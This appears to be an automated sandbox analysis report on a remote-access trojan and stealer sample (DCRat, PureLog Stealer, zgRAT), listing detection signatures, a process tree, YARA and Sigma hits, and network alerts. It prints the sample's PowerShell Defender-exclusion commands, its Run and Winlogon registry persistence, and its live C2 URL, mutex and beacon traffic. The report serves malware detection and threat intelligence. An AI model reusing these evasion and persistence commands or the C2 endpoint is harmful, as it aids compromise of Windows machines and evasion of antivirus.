Windows Analysis Report
s5duotgoYD.exe

Overview

General Information

Sample name: s5duotgoYD.exe (renamed because original name is a hash value)
Original sample name: B379F4AC167609D8A3EF26444098B61D.exe
Analysis ID: 1554055
MD5: b379f4ac167609d8a3ef26444098b61d
SHA1: 85fe0bbbe666d72a955ee98444415194e00739eb
SHA256: 430cba76bb21f0ff671a5345c15a51bd047b0f5aecf764ef4668ae9085d22b80
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • s5duotgoYD.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\s5duotgoYD.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
    • csc.exe (PID: 7576 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7628 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9C5.tmp" "c:\Windows\System32\CSC5850B7348A2C4AEC99A5FCDCA9CA019.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 8004 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8016 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ModemLogs\conhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8036 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\xKVBpkhCEjg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8056 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8072 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xKVBpkhCEjg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8088 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s5duotgoYD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2708 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 5080 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7704 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7936 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • RuntimeBroker.exe (PID: 4076 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
    • conhost.exe (PID: 7576 cmdline: C:\Windows\ModemLogs\conhost.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • backgroundTaskHost.exe (PID: 7200 cmdline: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
  • backgroundTaskHost.exe (PID: 1608 cmdline: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
  • conhost.exe (PID: 1732 cmdline: C:\Windows\ModemLogs\conhost.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • RuntimeBroker.exe (PID: 7660 cmdline: C:\Recovery\RuntimeBroker.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • RuntimeBroker.exe (PID: 7696 cmdline: C:\Recovery\RuntimeBroker.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • s5duotgoYD.exe (PID: 7864 cmdline: C:\Users\user\Desktop\s5duotgoYD.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • s5duotgoYD.exe (PID: 7860 cmdline: C:\Users\user\Desktop\s5duotgoYD.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • xKVBpkhCEjg.exe (PID: 7908 cmdline: C:\Recovery\xKVBpkhCEjg.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • xKVBpkhCEjg.exe (PID: 7924 cmdline: C:\Recovery\xKVBpkhCEjg.exe MD5: B379F4AC167609D8A3EF26444098B61D)
  • RuntimeBroker.exe (PID: 8240 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
  • svchost.exe (PID: 8644 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • conhost.exe (PID: 8784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • backgroundTaskHost.exe (PID: 9136 cmdline: "C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe" MD5: B379F4AC167609D8A3EF26444098B61D)
  • cleanup
{"C2 url": "http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral", "MUTEX": "DCR_MUTEX-vm4EBTsnJo8jd1Wf9GAL", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
s5duotgoYD.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
s5duotgoYD.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Recovery\xKVBpkhCEjg.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Recovery\xKVBpkhCEjg.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Recovery\RuntimeBroker.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Recovery\RuntimeBroker.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.1674094332.0000000000B82000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: s5duotgoYD.exe PID: 7416 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: RuntimeBroker.exe PID: 8240 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.s5duotgoYD.exe.b80000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.s5duotgoYD.exe.b80000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.s5duotgoYD.exe.131da5f8.6.raw.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\s5duotgoYD.exe, ProcessId: 7416, TargetFilename: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', ProcessId: 8004, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Windows\ModemLogs\conhost.exe, CommandLine: C:\Windows\ModemLogs\conhost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\ModemLogs\conhost.exe, NewProcessName: C:\Windows\ModemLogs\conhost.exe, OriginalFileName: C:\Windows\ModemLogs\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\ModemLogs\conhost.exe, ProcessId: 1732, ProcessName: conhost.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Recovery\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\s5duotgoYD.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: explorer.exe, "C:\Recovery\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\s5duotgoYD.exe, ProcessId: 7416, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", ProcessId: 7576, ProcessName: csc.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', ProcessId: 8004, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\s5duotgoYD.exe, ProcessId: 7416, TargetFilename: C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe', ProcessId: 8004, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8644, ProcessName: svchost.exe

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\s5duotgoYD.exe", ParentImage: C:\Users\user\Desktop\s5duotgoYD.exe, ParentProcessId: 7416, ParentProcessName: s5duotgoYD.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.cmdline", ProcessId: 7576, ProcessName: csc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-12T00:42:18.172405+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49730 | TCP
2024-11-12T00:43:01.129789+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49791 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-12T00:42:17.538372+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 37.44.238.250 | 80 | TCP

AV Detection

Source: s5duotgoYD.exe | Avira: detected
Source: http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php | Avira URL Cloud: Label: malware
Source: C:\Recovery\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\TCq2JLUA0X.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\UAuXMqPf.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\XIsgiJJb.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\WgRxdDkv.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Recovery\xKVBpkhCEjg.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000000.00000002.1812029430.0000000013178000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral", "MUTEX": "DCR_MUTEX-vm4EBTsnJo8jd1Wf9GAL", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe | ReversingLabs: Detection: 65%
Source: C:\Recovery\RuntimeBroker.exe | ReversingLabs: Detection: 65%
Source: C:\Recovery\xKVBpkhCEjg.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\SlQgWXuB.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\UAuXMqPf.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\WgRxdDkv.log | ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\XIsgiJJb.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\mjoVvRUx.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\pkWDNnmN.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\vEZKvYQi.log | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\vlWcZFKy.log | ReversingLabs: Detection: 50%
Source: C:\Windows\ModemLogs\conhost.exe | ReversingLabs: Detection: 65%
Source: C:\Windows\twain_32\xKVBpkhCEjg.exe | ReversingLabs: Detection: 65%
Source: s5duotgoYD.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\CjKcCUFn.log | Joe Sandbox ML: detected
Source: C:\Recovery\RuntimeBroker.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\UAuXMqPf.log | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\WgRxdDkv.log | Joe Sandbox ML: detected
Source: C:\Recovery\xKVBpkhCEjg.exe | Joe Sandbox ML: detected
Source: s5duotgoYD.exe | Joe Sandbox ML: detected
Source: s5duotgoYD.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Directory created: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exe
Source: C:\Users\user\Desktop\s5duotgoYD.exe | Directory created: C:\Program Files\Windows Portable Devices\eddb19405b7ce1
Source: s5duotgoYD.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.pdb source: s5duotgoYD.exe, 00000000.00000002.1759280751.000000000382F000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\s5duotgoYD.exe | File opened: C:\Users\user\AppData\Local

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49731 -> 37.44.238.250:80
Source: Joe Sandbox View | IP Address: 37.44.238.250
Source: Joe Sandbox View | ASN Name: HARMONYHOSTING-ASFR
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49730
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49791
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 384 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 2504 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 1812 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 2512 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 2512 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 2512 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 2512 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 1812 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 2512 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 1800 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 | Host: 500154cm.n9shteam.in | Content-Length: 2512 | Expect: 100-continue | Connection: Keep-Alive
